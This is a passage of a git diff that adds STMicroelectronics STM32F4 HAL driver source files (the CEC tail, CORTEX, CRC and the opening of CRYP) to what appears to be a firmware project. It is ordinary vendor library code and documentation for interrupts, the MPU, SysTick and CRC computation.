----------------------------Rx/Tx Error Management----------------------------------*/ + if ((reg & (CEC_ISR_RXOVR | CEC_ISR_BRE | CEC_ISR_SBPE | CEC_ISR_LBPE | CEC_ISR_RXACKE | CEC_ISR_TXUDR | CEC_ISR_TXERR | + CEC_ISR_TXACKE)) != 0U) + { + hcec->ErrorCode = reg; + __HAL_CEC_CLEAR_FLAG(hcec, HAL_CEC_ERROR_RXOVR | HAL_CEC_ERROR_BRE | CEC_FLAG_LBPE | CEC_FLAG_SBPE | + HAL_CEC_ERROR_RXACKE | HAL_CEC_ERROR_TXUDR | HAL_CEC_ERROR_TXERR | HAL_CEC_ERROR_TXACKE); + + + if ((reg & (CEC_ISR_RXOVR | CEC_ISR_BRE | CEC_ISR_SBPE | CEC_ISR_LBPE | CEC_ISR_RXACKE)) != 0U) + { + hcec->Init.RxBuffer -= hcec->RxXferSize; + hcec->RxXferSize = 0U; + hcec->RxState = HAL_CEC_STATE_READY; + } + else if (((reg & CEC_ISR_ARBLST) == 0U) && ((reg & (CEC_ISR_TXUDR | CEC_ISR_TXERR | CEC_ISR_TXACKE)) != 0U)) + { + /* Set the CEC state ready to be able to start again the process */ + hcec->gState = HAL_CEC_STATE_READY; + } + else + { + /* Nothing todo*/ + } +#if (USE_HAL_CEC_REGISTER_CALLBACKS == 1U) + hcec->ErrorCallback(hcec); +#else + /* Error Call Back */ + HAL_CEC_ErrorCallback(hcec); +#endif /* USE_HAL_CEC_REGISTER_CALLBACKS */ + } + else + { + /* Nothing todo*/ + } +} + +/** + * @brief Tx Transfer completed callback + * @param hcec CEC handle + * @retval None + */ +__weak void HAL_CEC_TxCpltCallback(CEC_HandleTypeDef *hcec) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcec); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CEC_TxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callback + * @param hcec CEC handle + * @param RxFrameSize Size of frame + * @retval None + */ +__weak void HAL_CEC_RxCpltCallback(CEC_HandleTypeDef *hcec, uint32_t RxFrameSize) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcec); + UNUSED(RxFrameSize); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CEC_RxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief CEC error callbacks + * @param hcec CEC handle + * @retval None + */ +__weak void HAL_CEC_ErrorCallback(CEC_HandleTypeDef *hcec) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcec); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CEC_ErrorCallback can be implemented in the user file + */ +} +/** + * @} + */ + +/** @defgroup CEC_Exported_Functions_Group3 Peripheral Control function + * @brief CEC control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control function ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the CEC. + (+) HAL_CEC_GetState() API can be helpful to check in run-time the state of the CEC peripheral. + (+) HAL_CEC_GetError() API can be helpful to check in run-time the error of the CEC peripheral. +@endverbatim + * @{ + */ +/** + * @brief return the CEC state + * @param hcec pointer to a CEC_HandleTypeDef structure that contains + * the configuration information for the specified CEC module. + * @retval HAL state + */ +HAL_CEC_StateTypeDef HAL_CEC_GetState(CEC_HandleTypeDef *hcec) +{ + uint32_t temp1, temp2; + temp1 = hcec->gState; + temp2 = hcec->RxState; + + return (HAL_CEC_StateTypeDef)(temp1 | temp2); +} + +/** + * @brief Return the CEC error code + * @param hcec pointer to a CEC_HandleTypeDef structure that contains + * the configuration information for the specified CEC. + * @retval CEC Error Code + */ +uint32_t HAL_CEC_GetError(CEC_HandleTypeDef *hcec) +{ + return hcec->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ +#endif /* CEC */ +#endif /* HAL_CEC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cortex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cortex.c new file mode 100644 index 000000000..2efb98640 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cortex.c @@ -0,0 +1,505 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_cortex.c + * @author MCD Application Team + * @brief CORTEX HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the CORTEX: + * + Initialization and de-initialization functions + * + Peripheral Control functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + + [..] + *** How to configure Interrupts using CORTEX HAL driver *** + =========================================================== + [..] + This section provides functions allowing to configure the NVIC interrupts (IRQ). + The Cortex-M4 exceptions are managed by CMSIS functions. + + (#) Configure the NVIC Priority Grouping using HAL_NVIC_SetPriorityGrouping() + function according to the following table. + (#) Configure the priority of the selected IRQ Channels using HAL_NVIC_SetPriority(). + (#) Enable the selected IRQ Channels using HAL_NVIC_EnableIRQ(). + (#) please refer to programming manual for details in how to configure priority. + + -@- When the NVIC_PRIORITYGROUP_0 is selected, IRQ preemption is no more possible. + The pending IRQ priority will be managed only by the sub priority. + + -@- IRQ priority order (sorted by highest to lowest priority): + (+@) Lowest preemption priority + (+@) Lowest sub priority + (+@) Lowest hardware priority (IRQ number) + + [..] + *** How to configure Systick using CORTEX HAL driver *** + ======================================================== + [..] + Setup SysTick Timer for time base. + + (+) The HAL_SYSTICK_Config() function calls the SysTick_Config() function which + is a CMSIS function that: + (++) Configures the SysTick Reload register with value passed as function parameter. + (++) Configures the SysTick IRQ priority to the lowest value 0x0F. + (++) Resets the SysTick Counter register. + (++) Configures the SysTick Counter clock source to be Core Clock Source (HCLK). + (++) Enables the SysTick Interrupt. + (++) Starts the SysTick Counter. + + (+) You can change the SysTick Clock source to be HCLK_Div8 by calling the macro + __HAL_CORTEX_SYSTICKCLK_CONFIG(SYSTICK_CLKSOURCE_HCLK_DIV8) just after the + HAL_SYSTICK_Config() function call. The __HAL_CORTEX_SYSTICKCLK_CONFIG() macro is defined + inside the stm32f4xx_hal_cortex.h file. + + (+) You can change the SysTick IRQ priority by calling the + HAL_NVIC_SetPriority(SysTick_IRQn,...) function just after the HAL_SYSTICK_Config() function + call. The HAL_NVIC_SetPriority() call the NVIC_SetPriority() function which is a CMSIS function. + + (+) To adjust the SysTick time base, use the following formula: + + Reload Value = SysTick Counter Clock (Hz) x Desired Time base (s) + (++) Reload Value is the parameter to be passed for HAL_SYSTICK_Config() function + (++) Reload Value should not exceed 0xFFFFFF + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup CORTEX CORTEX + * @brief CORTEX HAL module driver + * @{ + */ + +#ifdef HAL_CORTEX_MODULE_ENABLED + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup CORTEX_Exported_Functions CORTEX Exported Functions + * @{ + */ + + +/** @defgroup CORTEX_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de-initialization functions ##### + ============================================================================== + [..] + This section provides the CORTEX HAL driver functions allowing to configure Interrupts + Systick functionalities + +@endverbatim + * @{ + */ + + +/** + * @brief Sets the priority grouping field (preemption priority and subpriority) + * using the required unlock sequence. + * @param PriorityGroup The priority grouping bits length. + * This parameter can be one of the following values: + * @arg NVIC_PRIORITYGROUP_0: 0 bits for preemption priority + * 4 bits for subpriority + * @arg NVIC_PRIORITYGROUP_1: 1 bits for preemption priority + * 3 bits for subpriority + * @arg NVIC_PRIORITYGROUP_2: 2 bits for preemption priority + * 2 bits for subpriority + * @arg NVIC_PRIORITYGROUP_3: 3 bits for preemption priority + * 1 bits for subpriority + * @arg NVIC_PRIORITYGROUP_4: 4 bits for preemption priority + * 0 bits for subpriority + * @note When the NVIC_PriorityGroup_0 is selected, IRQ preemption is no more possible. + * The pending IRQ priority will be managed only by the subpriority. + * @retval None + */ +void HAL_NVIC_SetPriorityGrouping(uint32_t PriorityGroup) +{ + /* Check the parameters */ + assert_param(IS_NVIC_PRIORITY_GROUP(PriorityGroup)); + + /* Set the PRIGROUP[10:8] bits according to the PriorityGroup parameter value */ + NVIC_SetPriorityGrouping(PriorityGroup); +} + +/** + * @brief Sets the priority of an interrupt. + * @param IRQn External interrupt number. + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @param PreemptPriority The preemption priority for the IRQn channel. + * This parameter can be a value between 0 and 15 + * A lower priority value indicates a higher priority + * @param SubPriority the subpriority level for the IRQ channel. + * This parameter can be a value between 0 and 15 + * A lower priority value indicates a higher priority. + * @retval None + */ +void HAL_NVIC_SetPriority(IRQn_Type IRQn, uint32_t PreemptPriority, uint32_t SubPriority) +{ + uint32_t prioritygroup = 0x00U; + + /* Check the parameters */ + assert_param(IS_NVIC_SUB_PRIORITY(SubPriority)); + assert_param(IS_NVIC_PREEMPTION_PRIORITY(PreemptPriority)); + + prioritygroup = NVIC_GetPriorityGrouping(); + + NVIC_SetPriority(IRQn, NVIC_EncodePriority(prioritygroup, PreemptPriority, SubPriority)); +} + +/** + * @brief Enables a device specific interrupt in the NVIC interrupt controller. + * @note To configure interrupts priority correctly, the NVIC_PriorityGroupConfig() + * function should be called before. + * @param IRQn External interrupt number. + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @retval None + */ +void HAL_NVIC_EnableIRQ(IRQn_Type IRQn) +{ + /* Check the parameters */ + assert_param(IS_NVIC_DEVICE_IRQ(IRQn)); + + /* Enable interrupt */ + NVIC_EnableIRQ(IRQn); +} + +/** + * @brief Disables a device specific interrupt in the NVIC interrupt controller. + * @param IRQn External interrupt number. + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @retval None + */ +void HAL_NVIC_DisableIRQ(IRQn_Type IRQn) +{ + /* Check the parameters */ + assert_param(IS_NVIC_DEVICE_IRQ(IRQn)); + + /* Disable interrupt */ + NVIC_DisableIRQ(IRQn); +} + +/** + * @brief Initiates a system reset request to reset the MCU. + * @retval None + */ +void HAL_NVIC_SystemReset(void) +{ + /* System Reset */ + NVIC_SystemReset(); +} + +/** + * @brief Initializes the System Timer and its interrupt, and starts the System Tick Timer. + * Counter is in free running mode to generate periodic interrupts. + * @param TicksNumb Specifies the ticks Number of ticks between two interrupts. + * @retval status: - 0 Function succeeded. + * - 1 Function failed. + */ +uint32_t HAL_SYSTICK_Config(uint32_t TicksNumb) +{ + return SysTick_Config(TicksNumb); +} +/** + * @} + */ + +/** @defgroup CORTEX_Exported_Functions_Group2 Peripheral Control functions + * @brief Cortex control functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control the CORTEX + (NVIC, SYSTICK, MPU) functionalities. + + +@endverbatim + * @{ + */ + +#if (__MPU_PRESENT == 1U) +/** + * @brief Disables the MPU + * @retval None + */ +void HAL_MPU_Disable(void) +{ + /* Make sure outstanding transfers are done */ + __DMB(); + + /* Disable fault exceptions */ + SCB->SHCSR &= ~SCB_SHCSR_MEMFAULTENA_Msk; + + /* Disable the MPU and clear the control register*/ + MPU->CTRL = 0U; +} + +/** + * @brief Enable the MPU. + * @param MPU_Control Specifies the control mode of the MPU during hard fault, + * NMI, FAULTMASK and privileged access to the default memory + * This parameter can be one of the following values: + * @arg MPU_HFNMI_PRIVDEF_NONE + * @arg MPU_HARDFAULT_NMI + * @arg MPU_PRIVILEGED_DEFAULT + * @arg MPU_HFNMI_PRIVDEF + * @retval None + */ +void HAL_MPU_Enable(uint32_t MPU_Control) +{ + /* Enable the MPU */ + MPU->CTRL = MPU_Control | MPU_CTRL_ENABLE_Msk; + + /* Enable fault exceptions */ + SCB->SHCSR |= SCB_SHCSR_MEMFAULTENA_Msk; + + /* Ensure MPU setting take effects */ + __DSB(); + __ISB(); +} + +/** + * @brief Initializes and configures the Region and the memory to be protected. + * @param MPU_Init Pointer to a MPU_Region_InitTypeDef structure that contains + * the initialization and configuration information. + * @retval None + */ +void HAL_MPU_ConfigRegion(MPU_Region_InitTypeDef *MPU_Init) +{ + /* Check the parameters */ + assert_param(IS_MPU_REGION_NUMBER(MPU_Init->Number)); + assert_param(IS_MPU_REGION_ENABLE(MPU_Init->Enable)); + + /* Set the Region number */ + MPU->RNR = MPU_Init->Number; + + if ((MPU_Init->Enable) != RESET) + { + /* Check the parameters */ + assert_param(IS_MPU_INSTRUCTION_ACCESS(MPU_Init->DisableExec)); + assert_param(IS_MPU_REGION_PERMISSION_ATTRIBUTE(MPU_Init->AccessPermission)); + assert_param(IS_MPU_TEX_LEVEL(MPU_Init->TypeExtField)); + assert_param(IS_MPU_ACCESS_SHAREABLE(MPU_Init->IsShareable)); + assert_param(IS_MPU_ACCESS_CACHEABLE(MPU_Init->IsCacheable)); + assert_param(IS_MPU_ACCESS_BUFFERABLE(MPU_Init->IsBufferable)); + assert_param(IS_MPU_SUB_REGION_DISABLE(MPU_Init->SubRegionDisable)); + assert_param(IS_MPU_REGION_SIZE(MPU_Init->Size)); + + MPU->RBAR = MPU_Init->BaseAddress; + MPU->RASR = ((uint32_t)MPU_Init->DisableExec << MPU_RASR_XN_Pos) | + ((uint32_t)MPU_Init->AccessPermission << MPU_RASR_AP_Pos) | + ((uint32_t)MPU_Init->TypeExtField << MPU_RASR_TEX_Pos) | + ((uint32_t)MPU_Init->IsShareable << MPU_RASR_S_Pos) | + ((uint32_t)MPU_Init->IsCacheable << MPU_RASR_C_Pos) | + ((uint32_t)MPU_Init->IsBufferable << MPU_RASR_B_Pos) | + ((uint32_t)MPU_Init->SubRegionDisable << MPU_RASR_SRD_Pos) | + ((uint32_t)MPU_Init->Size << MPU_RASR_SIZE_Pos) | + ((uint32_t)MPU_Init->Enable << MPU_RASR_ENABLE_Pos); + } + else + { + MPU->RBAR = 0x00U; + MPU->RASR = 0x00U; + } +} +#endif /* __MPU_PRESENT */ + +/** + * @brief Gets the priority grouping field from the NVIC Interrupt Controller. + * @retval Priority grouping field (SCB->AIRCR [10:8] PRIGROUP field) + */ +uint32_t HAL_NVIC_GetPriorityGrouping(void) +{ + /* Get the PRIGROUP[10:8] field value */ + return NVIC_GetPriorityGrouping(); +} + +/** + * @brief Gets the priority of an interrupt. + * @param IRQn External interrupt number. + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @param PriorityGroup the priority grouping bits length. + * This parameter can be one of the following values: + * @arg NVIC_PRIORITYGROUP_0: 0 bits for preemption priority + * 4 bits for subpriority + * @arg NVIC_PRIORITYGROUP_1: 1 bits for preemption priority + * 3 bits for subpriority + * @arg NVIC_PRIORITYGROUP_2: 2 bits for preemption priority + * 2 bits for subpriority + * @arg NVIC_PRIORITYGROUP_3: 3 bits for preemption priority + * 1 bits for subpriority + * @arg NVIC_PRIORITYGROUP_4: 4 bits for preemption priority + * 0 bits for subpriority + * @param pPreemptPriority Pointer on the Preemptive priority value (starting from 0). + * @param pSubPriority Pointer on the Subpriority value (starting from 0). + * @retval None + */ +void HAL_NVIC_GetPriority(IRQn_Type IRQn, uint32_t PriorityGroup, uint32_t *pPreemptPriority, uint32_t *pSubPriority) +{ + /* Check the parameters */ + assert_param(IS_NVIC_PRIORITY_GROUP(PriorityGroup)); + /* Get priority for Cortex-M system or device specific interrupts */ + NVIC_DecodePriority(NVIC_GetPriority(IRQn), PriorityGroup, pPreemptPriority, pSubPriority); +} + +/** + * @brief Sets Pending bit of an external interrupt. + * @param IRQn External interrupt number + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @retval None + */ +void HAL_NVIC_SetPendingIRQ(IRQn_Type IRQn) +{ + /* Check the parameters */ + assert_param(IS_NVIC_DEVICE_IRQ(IRQn)); + + /* Set interrupt pending */ + NVIC_SetPendingIRQ(IRQn); +} + +/** + * @brief Gets Pending Interrupt (reads the pending register in the NVIC + * and returns the pending bit for the specified interrupt). + * @param IRQn External interrupt number. + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @retval status: - 0 Interrupt status is not pending. + * - 1 Interrupt status is pending. + */ +uint32_t HAL_NVIC_GetPendingIRQ(IRQn_Type IRQn) +{ + /* Check the parameters */ + assert_param(IS_NVIC_DEVICE_IRQ(IRQn)); + + /* Return 1 if pending else 0 */ + return NVIC_GetPendingIRQ(IRQn); +} + +/** + * @brief Clears the pending bit of an external interrupt. + * @param IRQn External interrupt number. + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @retval None + */ +void HAL_NVIC_ClearPendingIRQ(IRQn_Type IRQn) +{ + /* Check the parameters */ + assert_param(IS_NVIC_DEVICE_IRQ(IRQn)); + + /* Clear pending interrupt */ + NVIC_ClearPendingIRQ(IRQn); +} + +/** + * @brief Gets active interrupt ( reads the active register in NVIC and returns the active bit). + * @param IRQn External interrupt number + * This parameter can be an enumerator of IRQn_Type enumeration + * (For the complete STM32 Devices IRQ Channels list, please refer to the appropriate CMSIS device file (stm32f4xxxx.h)) + * @retval status: - 0 Interrupt status is not pending. + * - 1 Interrupt status is pending. + */ +uint32_t HAL_NVIC_GetActive(IRQn_Type IRQn) +{ + /* Check the parameters */ + assert_param(IS_NVIC_DEVICE_IRQ(IRQn)); + + /* Return 1 if active else 0 */ + return NVIC_GetActive(IRQn); +} + +/** + * @brief Configures the SysTick clock source. + * @param CLKSource specifies the SysTick clock source. + * This parameter can be one of the following values: + * @arg SYSTICK_CLKSOURCE_HCLK_DIV8: AHB clock divided by 8 selected as SysTick clock source. + * @arg SYSTICK_CLKSOURCE_HCLK: AHB clock selected as SysTick clock source. + * @retval None + */ +void HAL_SYSTICK_CLKSourceConfig(uint32_t CLKSource) +{ + /* Check the parameters */ + assert_param(IS_SYSTICK_CLK_SOURCE(CLKSource)); + if (CLKSource == SYSTICK_CLKSOURCE_HCLK) + { + SysTick->CTRL |= SYSTICK_CLKSOURCE_HCLK; + } + else + { + SysTick->CTRL &= ~SYSTICK_CLKSOURCE_HCLK; + } +} + +/** + * @brief This function handles SYSTICK interrupt request. + * @retval None + */ +void HAL_SYSTICK_IRQHandler(void) +{ + HAL_SYSTICK_Callback(); +} + +/** + * @brief SYSTICK callback. + * @retval None + */ +__weak void HAL_SYSTICK_Callback(void) +{ + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SYSTICK_Callback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_CORTEX_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_crc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_crc.c new file mode 100644 index 000000000..652eeda37 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_crc.c @@ -0,0 +1,330 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_crc.c + * @author MCD Application Team + * @brief CRC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Cyclic Redundancy Check (CRC) peripheral: + * + Initialization and de-initialization functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + =============================================================================== + ##### How to use this driver ##### + =============================================================================== + [..] + (+) Enable CRC AHB clock using __HAL_RCC_CRC_CLK_ENABLE(); + (+) Initialize CRC calculator + (++) specify generating polynomial (peripheral default or non-default one) + (++) specify initialization value (peripheral default or non-default one) + (++) specify input data format + (++) specify input or output data inversion mode if any + (+) Use HAL_CRC_Accumulate() function to compute the CRC value of the + input data buffer starting with the previously computed CRC as + initialization value + (+) Use HAL_CRC_Calculate() function to compute the CRC value of the + input data buffer starting with the defined initialization value + (default or non-default) to initiate CRC calculation + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup CRC CRC + * @brief CRC HAL module driver. + * @{ + */ + +#ifdef HAL_CRC_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup CRC_Exported_Functions CRC Exported Functions + * @{ + */ + +/** @defgroup CRC_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions. + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize the CRC according to the specified parameters + in the CRC_InitTypeDef and create the associated handle + (+) DeInitialize the CRC peripheral + (+) Initialize the CRC MSP (MCU Specific Package) + (+) DeInitialize the CRC MSP + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the CRC according to the specified + * parameters in the CRC_InitTypeDef and create the associated handle. + * @param hcrc CRC handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRC_Init(CRC_HandleTypeDef *hcrc) +{ + /* Check the CRC handle allocation */ + if (hcrc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CRC_ALL_INSTANCE(hcrc->Instance)); + + if (hcrc->State == HAL_CRC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hcrc->Lock = HAL_UNLOCKED; + /* Init the low level hardware */ + HAL_CRC_MspInit(hcrc); + } + + /* Change CRC peripheral state */ + hcrc->State = HAL_CRC_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief DeInitialize the CRC peripheral. + * @param hcrc CRC handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRC_DeInit(CRC_HandleTypeDef *hcrc) +{ + /* Check the CRC handle allocation */ + if (hcrc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CRC_ALL_INSTANCE(hcrc->Instance)); + + /* Check the CRC peripheral state */ + if (hcrc->State == HAL_CRC_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Change CRC peripheral state */ + hcrc->State = HAL_CRC_STATE_BUSY; + + /* Reset CRC calculation unit */ + __HAL_CRC_DR_RESET(hcrc); + + /* Reset IDR register content */ + CLEAR_BIT(hcrc->Instance->IDR, CRC_IDR_IDR); + + /* DeInit the low level hardware */ + HAL_CRC_MspDeInit(hcrc); + + /* Change CRC peripheral state */ + hcrc->State = HAL_CRC_STATE_RESET; + + /* Process unlocked */ + __HAL_UNLOCK(hcrc); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initializes the CRC MSP. + * @param hcrc CRC handle + * @retval None + */ +__weak void HAL_CRC_MspInit(CRC_HandleTypeDef *hcrc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcrc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CRC_MspInit can be implemented in the user file + */ +} + +/** + * @brief DeInitialize the CRC MSP. + * @param hcrc CRC handle + * @retval None + */ +__weak void HAL_CRC_MspDeInit(CRC_HandleTypeDef *hcrc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcrc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CRC_MspDeInit can be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup CRC_Exported_Functions_Group2 Peripheral Control functions + * @brief management functions. + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) compute the 32-bit CRC value of a 32-bit data buffer + using combination of the previous CRC value and the new one. + + [..] or + + (+) compute the 32-bit CRC value of a 32-bit data buffer + independently of the previous CRC value. + +@endverbatim + * @{ + */ + +/** + * @brief Compute the 32-bit CRC value of a 32-bit data buffer + * starting with the previously computed CRC as initialization value. + * @param hcrc CRC handle + * @param pBuffer pointer to the input data buffer. + * @param BufferLength input data buffer length (number of uint32_t words). + * @retval uint32_t CRC (returned value LSBs for CRC shorter than 32 bits) + */ +uint32_t HAL_CRC_Accumulate(CRC_HandleTypeDef *hcrc, uint32_t pBuffer[], uint32_t BufferLength) +{ + uint32_t index; /* CRC input data buffer index */ + uint32_t temp = 0U; /* CRC output (read from hcrc->Instance->DR register) */ + + /* Change CRC peripheral state */ + hcrc->State = HAL_CRC_STATE_BUSY; + + /* Enter Data to the CRC calculator */ + for (index = 0U; index < BufferLength; index++) + { + hcrc->Instance->DR = pBuffer[index]; + } + temp = hcrc->Instance->DR; + + /* Change CRC peripheral state */ + hcrc->State = HAL_CRC_STATE_READY; + + /* Return the CRC computed value */ + return temp; +} + +/** + * @brief Compute the 32-bit CRC value of a 32-bit data buffer + * starting with hcrc->Instance->INIT as initialization value. + * @param hcrc CRC handle + * @param pBuffer pointer to the input data buffer. + * @param BufferLength input data buffer length (number of uint32_t words). + * @retval uint32_t CRC (returned value LSBs for CRC shorter than 32 bits) + */ +uint32_t HAL_CRC_Calculate(CRC_HandleTypeDef *hcrc, uint32_t pBuffer[], uint32_t BufferLength) +{ + uint32_t index; /* CRC input data buffer index */ + uint32_t temp = 0U; /* CRC output (read from hcrc->Instance->DR register) */ + + /* Change CRC peripheral state */ + hcrc->State = HAL_CRC_STATE_BUSY; + + /* Reset CRC Calculation Unit (hcrc->Instance->INIT is + * written in hcrc->Instance->DR) */ + __HAL_CRC_DR_RESET(hcrc); + + /* Enter 32-bit input data to the CRC calculator */ + for (index = 0U; index < BufferLength; index++) + { + hcrc->Instance->DR = pBuffer[index]; + } + temp = hcrc->Instance->DR; + + /* Change CRC peripheral state */ + hcrc->State = HAL_CRC_STATE_READY; + + /* Return the CRC computed value */ + return temp; +} + +/** + * @} + */ + +/** @defgroup CRC_Exported_Functions_Group3 Peripheral State functions + * @brief Peripheral State functions. + * +@verbatim + =============================================================================== + ##### Peripheral State functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral. + +@endverbatim + * @{ + */ + +/** + * @brief Return the CRC handle state. + * @param hcrc CRC handle + * @retval HAL state + */ +HAL_CRC_StateTypeDef HAL_CRC_GetState(CRC_HandleTypeDef *hcrc) +{ + /* Return CRC handle state */ + return hcrc->State; +} + +/** + * @} + */ + +/** + * @} + */ + + +#endif /* HAL_CRC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cryp.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cryp.c new file mode 100644 index 000000000..efb64e596 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cryp.c @@ -0,0 +1,7133 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_cryp.c + * @author MCD Application Team + * @brief CRYP HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Cryptography (CRYP) peripheral: + * + Initialization, de-initialization, set config and get config functions + * + DES/TDES, AES processing functions + * + DMA callback functions + * + CRYP IRQ handler management + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The CRYP HAL driver can be used in CRYP or TinyAES IP as follows: + + (#)Initialize the CRYP low level resources by implementing the HAL_CRYP_MspInit(): + (##) Enable the CRYP interface clock using __HAL_RCC_CRYP_CLK_ENABLE()or __HAL_RCC_AES_CLK_ENABLE for TinyAES IP + (##) In case of using interrupts (e.g. HAL_CRYP_Encrypt_IT()) + (+++) Configure the CRYP interrupt priority using HAL_NVIC_SetPriority() + (+++) Enable the CRYP IRQ handler using HAL_NVIC_EnableIRQ() + (+++) In CRYP IRQ handler, call HAL_CRYP_IRQHandler() + (##) In case of using DMA to control data transfer (e.g. HAL_CRYP_Encrypt_DMA()) + (+++) Enable the DMAx interface clock using __RCC_DMAx_CLK_ENABLE() + (+++) Configure and enable two DMA streams one for managing data transfer from + memory to peripheral (input stream) and another stream for managing data + transfer from peripheral to memory (output stream) + (+++) Associate the initialized DMA handle to the CRYP DMA handle + using __HAL_LINKDMA() + (+++) Configure the priority and enable the NVIC for the transfer complete + interrupt on the two DMA Streams. The output stream should have higher + priority than the input stream HAL_NVIC_SetPriority() and 